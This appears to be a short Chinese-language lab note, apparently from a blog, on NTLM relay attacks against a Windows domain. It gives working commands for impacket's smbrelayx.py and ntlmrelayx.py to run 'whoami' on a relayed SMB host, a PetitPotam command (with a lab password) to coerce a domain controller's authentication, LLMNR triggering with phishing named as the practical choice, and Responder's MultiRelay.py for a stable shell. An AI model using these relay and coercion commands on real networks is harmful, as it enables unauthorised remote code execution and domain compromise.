先记录relay2SMB的，relay2LDAP的会补上来。

后面的一些利用EXCHANGE服务器的writedacl权限来relay2EWS + DCSync的等我安了EXCHANGE再说吧2333。。

1. relay2SMB

0x01 smbrelayx.py

监听Net-NTLM，然后中继到win2008的SMB服务，执行whoami命令：(oops，不能relay到域控。。。因为开了SMB签名，，)

python3 smbrelayx.py -h 192.168.72.139 -c whoami

接下来触发Net-NTLM：

很多方法，这里用打印机漏洞的话不行，

让域控的机器账户发起Net-NTLM：

python3 PetitPotam.py -d intranet.com -u win2008 -p 1q2w3eQWE 192.168.72.128 192.168.72.131

因为这是个机器账户，没法smb之类的。

这里选择用LLMNR触发（主要是弄清楚原理，实战肯定选择钓鱼啊。。。）

0x02 nltmrelayx.py

还是impacket的，支持更多协议：

python3 ntlmrelayx.py -t smb://192.168.72.139 -c whoami -smb2support

一样的触发：

0x03 MultiRelay.py

这个是 Responder/tools 下的，可以通过 ALL参数拿到一个稳定的shell

./MultiRelay.py -t 192.168.72.139 -u ALL